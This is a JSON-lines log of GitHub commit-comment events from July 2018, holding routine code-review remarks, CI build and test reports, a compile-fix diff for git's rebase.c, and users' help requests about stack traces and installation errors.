{"id":"7964274376","type":"CommitCommentEvent","actor":{"login":"rakyll"},"repo":{"name":"adamgarza/opencensus-website"},"payload":{"comment":{"id":29705230,"position":null,"line":null,"path":null,"commit_id":"95621ed6bdcd65b3408208c3e738bb6d514d08a6","created_at":"2018-07-13T20:46:22Z","updated_at":"2018-07-13T20:46:22Z","author_association":"NONE","body":"Looks good but bulletin points used for title is not the right approach.\r\n\r\nThey can be headers."}},"created_at":"2018-07-13T20:46:22Z"}
{"id":"7964278065","type":"CommitCommentEvent","actor":{"login":"mvsusp"},"repo":{"name":"aws/sagemaker-tensorflow-container"},"payload":{"comment":{"id":29705236,"position":null,"line":null,"path":null,"commit_id":"f8082e05230770bdc18a423b05fcb321dbdada22","created_at":"2018-07-13T20:47:17Z","updated_at":"2018-07-13T20:47:17Z","author_association":"CONTRIBUTOR","body":"Can we add tests for the case where the pipe mode function is used but the training job is using file mode?"}},"created_at":"2018-07-13T20:47:17Z"}
{"id":"7964278104","type":"CommitCommentEvent","actor":{"login":"ranul-pallemulle"},"repo":{"name":"ranul-pallemulle/RMS"},"payload":{"comment":{"id":29705237,"position":null,"line":null,"path":null,"commit_id":"0b1c4cfe2bee0b7bb15a5a7a71eb8c750f94b7f5","created_at":"2018-07-13T20:47:18Z","updated_at":"2018-07-13T20:47:18Z","author_association":"OWNER","body":"-.-"}},"created_at":"2018-07-13T20:47:18Z"}
{"id":"7964281139","type":"CommitCommentEvent","actor":{"login":"IzzySoft"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29705242,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-13T20:48:04Z","updated_at":"2018-07-13T20:48:04Z","author_association":"NONE","body":"@JohnMH not necessarily. Why not simply migrate your repo over, and then update the `README.md` here accordingly? Only software needed for that would be a web browser, and at least part of the problem would be solved. Let me know if you did it, so I can propagate that information to F-Droid.\r\n\r\nFor the other part (tags & gradle), git might be needed to adjust the tag (I somehow lost track: has that part already been done by @albfan or not?) Don't forget to give your collaborateurs proper access on the new repo then; maybe @albfan can help out until you're \"fully back\"?"}},"created_at":"2018-07-13T20:48:04Z"}
{"id":"7964281978","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29705243,"position":57,"line":272,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:48:16Z","updated_at":"2018-07-13T20:48:16Z","author_association":"OWNER","body":"Yes, there was no need for progress prior to this because we don't defer normal sends at this time."}},"created_at":"2018-07-13T20:48:16Z"}
{"id":"7964285281","type":"CommitCommentEvent","actor":{"login":"vszakats"},"repo":{"name":"nmoinvaz/minizip"},"payload":{"comment":{"id":29705251,"position":null,"line":null,"path":null,"commit_id":"6b12c36538359827bd0b1cd097c6036417ad2ce5","created_at":"2018-07-13T20:49:04Z","updated_at":"2018-07-13T20:49:04Z","author_association":"CONTRIBUTOR","body":"At least with mingw-w64, `errno.h` is required for `EEXIST`. It has the value of `17`, so if `errno.h` may cause issues, this ugly construct can make the code build with every toolchain:\r\n``` c\r\n#ifndef EEXIST\r\n#define EEXIST  17\r\n#endif\r\n```"}},"created_at":"2018-07-13T20:49:04Z"}
{"id":"7964288214","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705259,"position":null,"line":null,"path":null,"commit_id":"ecd0f6079ced0e89f7c63933309724e1de31cf13","created_at":"2018-07-13T20:49:42Z","updated_at":"2018-07-13T20:49:42Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecd0f6079ced0e89f7c63933309724e1de31cf13-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecd0f6079ced0e89f7c63933309724e1de31cf13-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T20:49:42Z"}
{"id":"7964288351","type":"CommitCommentEvent","actor":{"login":"qw6542"},"repo":{"name":"qw6542/recipe_slim"},"payload":{"comment":{"id":29705260,"position":null,"line":null,"path":null,"commit_id":"b0e331b96ba0ed665b2a4f2f9c5cf642d29e91ec","created_at":"2018-07-13T20:49:44Z","updated_at":"2018-07-13T20:49:44Z","author_association":"OWNER","body":"fixes #1 "}},"created_at":"2018-07-13T20:49:44Z"}
{"id":"7964290563","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29705267,"position":5,"line":4,"path":"Updates/1589_black_morass_templates.sql","commit_id":"79151fd36b0980e5f1ea9a0170accecb3755993c","created_at":"2018-07-13T20:50:15Z","updated_at":"2018-07-13T20:50:15Z","author_association":"COLLABORATOR","body":"thx @Saltgurka "}},"created_at":"2018-07-13T20:50:15Z"}
{"id":"7964294623","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705277,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-13T20:51:13Z","updated_at":"2018-07-13T20:51:13Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2974 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T20:51:13Z"}
{"id":"7964299591","type":"CommitCommentEvent","actor":{"login":"dritter"},"repo":{"name":"dritter/powerlevel9k"},"payload":{"comment":{"id":29705289,"position":null,"line":null,"path":null,"commit_id":"e95be8f2086823115548dcc1fff616ba363779b1","created_at":"2018-07-13T20:52:25Z","updated_at":"2018-07-13T20:52:25Z","author_association":"OWNER","body":"I should sleep more.. o_0"}},"created_at":"2018-07-13T20:52:25Z"}
{"id":"7964299985","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/tips"},"payload":{"comment":{"id":29705290,"position":null,"line":null,"path":null,"commit_id":"0892da17b82a2aff533b9f1f78ee52c5491c961e","created_at":"2018-07-13T20:52:30Z","updated_at":"2018-07-13T20:52:30Z","author_association":"OWNER","body":"https://medium.com/cedex-technologies-llp/laravel-5-5-trait-generator-b83202a72294"}},"created_at":"2018-07-13T20:52:30Z"}
{"id":"7964301412","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29705292,"position":75,"line":313,"path":"prov/mrail/src/mrail.h","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:52:51Z","updated_at":"2018-07-13T20:52:51Z","author_association":"NONE","body":"If you format the subrequests from posts_left to 0, then posts_left is the index.  You just need to calculate posts_left first.  Posts_left can also be the index if you write the data somewhat backwards.  Or, yes, you need 2 values.  :)"}},"created_at":"2018-07-13T20:52:51Z"}
{"id":"7964304694","type":"CommitCommentEvent","actor":{"login":"petersilva"},"repo":{"name":"MetPX/sarracenia"},"payload":{"comment":{"id":29705302,"position":null,"line":null,"path":null,"commit_id":"229fe6929a6eed34081ee04619fc90239eee7fdd","created_at":"2018-07-13T20:53:39Z","updated_at":"2018-07-13T20:53:39Z","author_association":"CONTRIBUTOR","body":"- 4K blocks is too small. will be really crappy on large files.  in other components default is 1M\r\n. don't call the file .assembled... call it .tmp while it is being built (corresponds to default of sarra)\r\n- other than that, by inspection, it looks good!\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-13T20:53:39Z"}
{"id":"7964305658","type":"CommitCommentEvent","actor":{"login":"abasobito"},"repo":{"name":"nothing628/ai-cms"},"payload":{"comment":{"id":29705307,"position":null,"line":null,"path":null,"commit_id":"82fac86c990611dcf1c4eaa786169687f0275364","created_at":"2018-07-13T20:53:53Z","updated_at":"2018-07-13T20:53:53Z","author_association":"NONE","body":"hello how to install this scribt\r\nplease tell me\r\n"}},"created_at":"2018-07-13T20:53:53Z"}
{"id":"7964309271","type":"CommitCommentEvent","actor":{"login":"solschno"},"repo":{"name":"solschno/Hello-World"},"payload":{"comment":{"id":29705313,"position":null,"line":null,"path":null,"commit_id":"5f27f32bebc977dec2d970ba7d0314918fdd29dd","created_at":"2018-07-13T20:54:43Z","updated_at":"2018-07-13T20:54:43Z","author_association":"OWNER","body":"looks good"}},"created_at":"2018-07-13T20:54:43Z"}
{"id":"7964309835","type":"CommitCommentEvent","actor":{"login":"petersilva"},"repo":{"name":"MetPX/sarracenia"},"payload":{"comment":{"id":29705315,"position":null,"line":null,"path":null,"commit_id":"229fe6929a6eed34081ee04619fc90239eee7fdd","created_at":"2018-07-13T20:54:50Z","updated_at":"2018-07-13T20:54:50Z","author_association":"CONTRIBUTOR","body":"oh... and please write a man page as well...\r\n"}},"created_at":"2018-07-13T20:54:50Z"}
{"id":"7964310578","type":"CommitCommentEvent","actor":{"login":"Alexandre1406-2"},"repo":{"name":"MylesIsCool/ViaVersion"},"payload":{"comment":{"id":29705319,"position":null,"line":null,"path":null,"commit_id":"5f1fba0276f83391fa450310cd355df0904f128a","created_at":"2018-07-13T20:55:02Z","updated_at":"2018-07-13T20:55:02Z","author_association":"NONE","body":"\r\nHUMM HELP ME?\r\n\r\n\r\n16:52:07 [GRAVE] [/192.168.0.141:58492] <-> InitialHandler - encountered exception\r\nio.netty.handler.codec.DecoderException: java.lang.IndexOutOfBoundsException: readerIndex(16) + length(1) exceeds writerIndex(16): UnpooledSlicedByteBuf(ridx: 16, widx: 16, cap: 16/16, unwrapped: PooledUnsafeDirectByteBuf(ridx: 38, widx: 38, cap: 38))\r\n\tat io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:98)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)\r\n\tat io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:310)\r\n\tat io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:284)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)\r\n\tat io.netty.handler.codec.ByteToMessageDecoder.handlerRemoved(ByteToMessageDecoder.java:236)\r\n\tat io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:494)\r\n\tat io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:428)\r\n\tat io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:265)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)\r\n\tat io.netty.handler.timeout.IdleStateHandler.channelRead(IdleStateHandler.java:286)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)\r\n\tat io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1434)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)\r\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)\r\n\tat io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:965)\r\n\tat io.netty.channel.epoll.AbstractEpollStreamChannel$EpollStreamUnsafe.epollInReady(AbstractEpollStreamChannel.java:808)\r\n\tat io.netty.channel.epoll.EpollEventLoop.processReady(EpollEventLoop.java:408)\r\n\tat io.netty.channel.epoll.EpollEventLoop.run(EpollEventLoop.java:308)\r\n\tat io.netty.util.concurrent.SingleThreadEventExecutor$5.run(SingleThreadEventExecutor.java:884)\r\n\tat java.lang.Thread.run(Thread.java:748)\r\nCaused by: java.lang.IndexOutOfBoundsException: readerIndex(16) + length(1) exceeds writerIndex(16): UnpooledSlicedByteBuf(ridx: 16, widx: 16, cap: 16/16, unwrapped: PooledUnsafeDirectByteBuf(ridx: 38, widx: 38, cap: 38))\r\n\tat io.netty.buffer.AbstractByteBuf.checkReadableBytes0(AbstractByteBuf.java:1405)\r\n\tat io.netty.buffer.AbstractByteBuf.readByte(AbstractByteBuf.java:707)\r\n\tat net.md_5.bungee.protocol.DefinedPacket.readVarInt(DefinedPacket.java:108)\r\n\tat net.md_5.bungee.protocol.DefinedPacket.readVarInt(DefinedPacket.java:98)\r\n\tat net.md_5.bungee.protocol.DefinedPacket.readArray(DefinedPacket.java:66)\r\n\tat net.md_5.bungee.protocol.packet.EncryptionResponse.read(EncryptionResponse.java:26)\r\n\tat net.md_5.bungee.protocol.MinecraftDecoder.decode(MinecraftDecoder.java:33)\r\n\tat net.md_5.bungee.protocol.MinecraftDecoder.decode(MinecraftDecoder.java:10)\r\n\tat io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:88)\r\n\t... 28 more"}},"created_at":"2018-07-13T20:55:02Z"}
{"id":"7964310876","type":"CommitCommentEvent","actor":{"login":"stevectorbot"},"repo":{"name":"stevector/nerdologues-d8"},"payload":{"comment":{"id":29705320,"position":null,"line":null,"path":null,"commit_id":"55f732f3177c9132b40d21e5ed83bc943848255a","created_at":"2018-07-13T20:55:07Z","updated_at":"2018-07-13T20:55:07Z","author_association":"NONE","body":"### Visual regression report:\n\n[![Visual report](https://circleci.com/gh/stevector/nerdologues-d8/1904/artifacts/0/artifacts/backstop_data/bitmaps_test/20180713-205414/failed_diff_0600294051_Events_0_document_0_desktop.png)](https://circleci.com/gh/stevector/nerdologues-d8/1904/artifacts/0/artifacts/backstop_data/html_report/index.html)"}},"created_at":"2018-07-13T20:55:07Z"}
{"id":"7964313388","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705326,"position":26,"line":438,"path":"builtin/rebase.c","commit_id":"6397ab302721f8728910fd6acdb1085ec5824978","created_at":"2018-07-13T20:55:44Z","updated_at":"2018-07-13T20:55:44Z","author_association":"NONE","body":"`resolve_ref_unsafe()` actually returns a pointer... So I need this to make it compile:\r\n\r\n```diff\r\ndiff --git a/builtin/rebase.c b/builtin/rebase.c\r\nindex 1acd503b6e8..53d591e3c3c 100644\r\n--- a/builtin/rebase.c\r\n+++ b/builtin/rebase.c\r\n@@ -849,7 +849,7 @@ int cmd_rebase(int argc, const char **argv, const char *prefix)\r\n \t\t\t}\r\n \r\n \t\t\tif (!strcmp(branch_name, \"HEAD\") &&\r\n-\t\t\t    resolve_ref_unsafe(\"HEAD\", 0, NULL, &flag) < 0)\r\n+\t\t\t    resolve_ref_unsafe(\"HEAD\", 0, NULL, &flag))\r\n \t\t\t\tputs(_(\"HEAD is up to date.\"));\r\n \t\t\telse\r\n \t\t\t\tprintf(_(\"Current branch %s is up to date.\"),\r\n```\r\n\r\nOtherwise I would get this:\r\n\r\n```\r\nbuiltin/rebase.c:860:50: error: ordered comparison of pointer with integer zero\r\n[-Werror=extra]\r\n       resolve_ref_unsafe(\"HEAD\", 0, NULL, &flag) < 0)\r\n                                                  ^\r\n```\r\n\r\nPlease amend the commit accordingly."}},"created_at":"2018-07-13T20:55:44Z"}
{"id":"7964313644","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705328,"position":71,"line":432,"path":"builtin/rebase.c","commit_id":"b17876c1769ae42c8329780cbb3c53106f56f635","created_at":"2018-07-13T20:55:48Z","updated_at":"2018-07-13T20:55:48Z","author_association":"NONE","body":"`resolve_ref_unsafe()` actually returns a pointer... So I need this to make it compile:\r\n\r\n```diff\r\ndiff --git a/builtin/rebase.c b/builtin/rebase.c\r\nindex 1acd503b6e8..53d591e3c3c 100644\r\n--- a/builtin/rebase.c\r\n+++ b/builtin/rebase.c\r\n@@ -857,7 +857,7 @@ int cmd_rebase(int argc, const char **argv, const char *prefix)\r\n \t\t\tret = !!finish_rebase(&options);\r\n \t\t\tgoto cleanup;\r\n \t\t} else if (!strcmp(branch_name, \"HEAD\") &&\r\n-\t\t\t   resolve_ref_unsafe(\"HEAD\", 0, NULL, &flag) < 0)\r\n+\t\t\t   resolve_ref_unsafe(\"HEAD\", 0, NULL, &flag))\r\n \t\t\tputs(_(\"HEAD is up to date, rebase forced.\"));\r\n \t\telse\r\n \t\t\tprintf(_(\"Current branch %s is up to date, rebase \"\r\n```\r\n\r\nOtherwise I would get this:\r\n\r\n```\r\nbuiltin/rebase.c:860:50: error: ordered comparison of pointer with integer zero\r\n[-Werror=extra]\r\n       resolve_ref_unsafe(\"HEAD\", 0, NULL, &flag) < 0)\r\n                                                  ^\r\n```\r\n\r\nPlease amend the commit accordingly."}},"created_at":"2018-07-13T20:55:48Z"}
{"id":"7964313747","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29705329,"position":null,"line":null,"path":null,"commit_id":"f63cc3f8ffb93dce16603e312a3b122bbaa91a01","created_at":"2018-07-13T20:55:49Z","updated_at":"2018-07-13T20:55:49Z","author_association":"COLLABORATOR","body":"Added option to eliminate lines in exchange for markers. Later on this option might be traded out for a separate line graph option. Next step: getting Plotly to display the shared name of a node when you hover over it. At this point, it can officially be called a scatter plot!"}},"created_at":"2018-07-13T20:55:49Z"}
{"id":"7964315963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705333,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-13T20:56:21Z","updated_at":"2018-07-13T20:56:21Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T20:56:21Z"}
{"id":"7964319620","type":"CommitCommentEvent","actor":{"login":"TheEmrio"},"repo":{"name":"TheEmrio/magnoludovibot"},"payload":{"comment":{"id":29705337,"position":null,"line":null,"path":null,"commit_id":"2d991ad308a6da159690b54cf454ee1052255c14","created_at":"2018-07-13T20:57:15Z","updated_at":"2018-07-13T20:57:15Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-13T20:57:15Z"}
{"id":"7964319675","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29705338,"position":null,"line":null,"path":null,"commit_id":"3f8bfdeb24908819399d400688cc67e17dfc422c","created_at":"2018-07-13T20:57:16Z","updated_at":"2018-07-13T20:57:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-486](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-486).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-486-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T20:57:16Z"}
{"id":"7964324333","type":"CommitCommentEvent","actor":{"login":"admkakaroto"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29705355,"position":null,"line":null,"path":null,"commit_id":"dc413a3c572a421406159f70cf070a39f8f28824","created_at":"2018-07-13T20:58:26Z","updated_at":"2018-07-13T20:58:26Z","author_association":"CONTRIBUTOR","body":"Mr @aleos89 is it no longer necessary for the item to be equipped to use Mado's abilities?"}},"created_at":"2018-07-13T20:58:26Z"}
{"id":"7964325722","type":"CommitCommentEvent","actor":{"login":"laarmen"},"repo":{"name":"pioneerspacesim/pioneer"},"payload":{"comment":{"id":29705359,"position":5,"line":296,"path":"src/LuaSystemBody.cpp","commit_id":"4e4bb206df82613dfc61f84aaf7015fe45b6a631","created_at":"2018-07-13T20:58:48Z","updated_at":"2018-07-13T20:58:48Z","author_association":"CONTRIBUTOR","body":"Wouldn't it make sense to actually convert this value in year_t? https://github.com/nholthaus/units/blob/master/include/units.h#L3415"}},"created_at":"2018-07-13T20:58:48Z"}
{"id":"7964330629","type":"CommitCommentEvent","actor":{"login":"Talon1024"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29705379,"position":null,"line":null,"path":null,"commit_id":"d12a1ed05e9221f2bfa855c77e59b705376a93b1","created_at":"2018-07-13T21:00:04Z","updated_at":"2018-07-13T21:00:04Z","author_association":"CONTRIBUTOR","body":"GZDoom is going boldly where no Doom port has gone before... Vulkan! :+1: "}},"created_at":"2018-07-13T21:00:04Z"}
{"id":"7964333832","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29705393,"position":null,"line":null,"path":null,"commit_id":"0787f29288bbf98cc9d8996466d7e0f86a053c93","created_at":"2018-07-13T21:00:48Z","updated_at":"2018-07-13T21:00:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-368](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-368).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-368-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T21:00:48Z"}
{"id":"7964336630","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29705407,"position":null,"line":null,"path":null,"commit_id":"68cc9db17058f218a6baffbb5feda5472eecdbf0","created_at":"2018-07-13T21:01:29Z","updated_at":"2018-07-13T21:01:29Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/68cc9db17058f218a6baffbb5feda5472eecdbf0/index.html"}},"created_at":"2018-07-13T21:01:29Z"}
{"id":"7964338310","type":"CommitCommentEvent","actor":{"login":"Nightmare-Night"},"repo":{"name":"CloudSixteen/Clockwork"},"payload":{"comment":{"id":29705416,"position":null,"line":null,"path":null,"commit_id":"2b40cc1fcad19c87defb3aa05e4cc4b24e06f42b","created_at":"2018-07-13T21:01:55Z","updated_at":"2018-07-13T21:01:55Z","author_association":"CONTRIBUTOR","body":"As far as I was concerned at the time, and as I've explained before, the only issue I ran into was that the character data would only update upon reloading the character. (Switching my character then going back to the previous character) Whatever is the issue, or whatever is missing, it was causing it not to update _in-real-time_. \r\n\r\nI edited as per each time either a character is given or gets a flag taken from them, it refreshes and grabs the flags for that player. After I added the two lines, I haven't had any issue of flags becoming corrupt, or any sort of loop, or the flags being carried over globally as I never checked plygiveflags function.\r\n\r\nAnd I can confirm that prior to this bug fix, I was using the most recent CAX and have been connected. Basically, took whatever was available a few days before I made this pull request, and threw in this fix and it fixed the problem I was having with flags updating.\r\n\r\nBare with me if I misinterpreted anything you may of said, as this is my first pull request for clockwork.\r\n\r\n@kurozael  "}},"created_at":"2018-07-13T21:01:55Z"}
{"id":"7964343682","type":"CommitCommentEvent","actor":{"login":"phhusson"},"repo":{"name":"phhusson/device_phh_treble"},"payload":{"comment":{"id":29705433,"position":null,"line":null,"path":null,"commit_id":"731e612e215bd8f8a9d3942f608db2b3f7461b02","created_at":"2018-07-13T21:03:17Z","updated_at":"2018-07-13T21:03:17Z","author_association":"OWNER","body":"Did you actually test it?\r\nI feel like the comment will go in the way of it\r\n\r\nAnyway, just do a new product_property +="}},"created_at":"2018-07-13T21:03:17Z"}
{"id":"7964344912","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29705434,"position":null,"line":null,"path":null,"commit_id":"76b4dbd16946fca0affaeb833ea906675c2a8280","created_at":"2018-07-13T21:03:36Z","updated_at":"2018-07-13T21:03:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve special matches](https://trello.com/c/UYCCrgfv/10-improve-special-matches)"}},"created_at":"2018-07-13T21:03:36Z"}
{"id":"7964350162","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29705447,"position":null,"line":null,"path":null,"commit_id":"dcb1908adee2dc96f9799b697b48dfbeb2b38ee3","created_at":"2018-07-13T21:04:58Z","updated_at":"2018-07-13T21:04:58Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-56](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-56).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-56-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-13T21:04:58Z"}
{"id":"7964350317","type":"CommitCommentEvent","actor":{"login":"amghawn"},"repo":{"name":"amghawn/jamal"},"payload":{"comment":{"id":29705451,"position":31,"line":1225,"path":"jam.css","commit_id":"dd390e2600e21e51e684ab7ecbcee7e62c45e300","created_at":"2018-07-13T21:05:01Z","updated_at":"2018-07-13T21:05:01Z","author_association":"OWNER","body":"2222"}},"created_at":"2018-07-13T21:05:01Z"}
{"id":"7964355302","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29705460,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-13T21:06:20Z","updated_at":"2018-07-13T21:06:20Z","author_association":"NONE","body":"Hi,\r\n\r\nI'm interested in your script, but when I install it gives me the following error: \r\nIn Watcher.php line 104:\r\n\r\n   Call to undefined function App \\ inotify_init ()"}},"created_at":"2018-07-13T21:06:20Z"}
{"id":"7964363885","type":"CommitCommentEvent","actor":{"login":"nikochan2k"},"repo":{"name":"nikochan2k/gpslogger2probemon"},"payload":{"comment":{"id":29705472,"position":null,"line":null,"path":null,"commit_id":"0f4d30972c1b6a71ec71fdb1c85a910aa7f1e26c","created_at":"2018-07-13T21:08:40Z","updated_at":"2018-07-13T21:08:40Z","author_association":"OWNER","body":"Yes, I'll reply a comment if I finished.\r\n\r\nYou can also watch the repository:\r\nhttps://github.com/nikochan2k/pi-collector"}},"created_at":"2018-07-13T21:08:40Z"}
{"id":"7964366909","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"junit-team/junit5"},"payload":{"comment":{"id":29705482,"position":28,"line":37,"path":"junit-jupiter-params/src/main/java/org/junit/jupiter/params/provider/MethodSource.java","commit_id":"31e5044c021adcb14ce1b55483d25228f8e83d3f","created_at":"2018-07-13T21:09:30Z","updated_at":"2018-07-13T21:09:30Z","author_association":"MEMBER","body":"Well... perhaps we do it rather _covertly_. 🤣 "}},"created_at":"2018-07-13T21:09:30Z"}
{"id":"7964369760","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29705488,"position":15,"line":15,"path":"eleventhLesson/script.js","commit_id":"50cea62698c5fb175fd6fdb172bb7aac9b36db07","created_at":"2018-07-13T21:10:16Z","updated_at":"2018-07-13T21:10:16Z","author_association":"NONE","body":"Не совсем понимаю, для чего эта проверка: `arr.length == outputArr.length` ?\r\n"}},"created_at":"2018-07-13T21:10:16Z"}
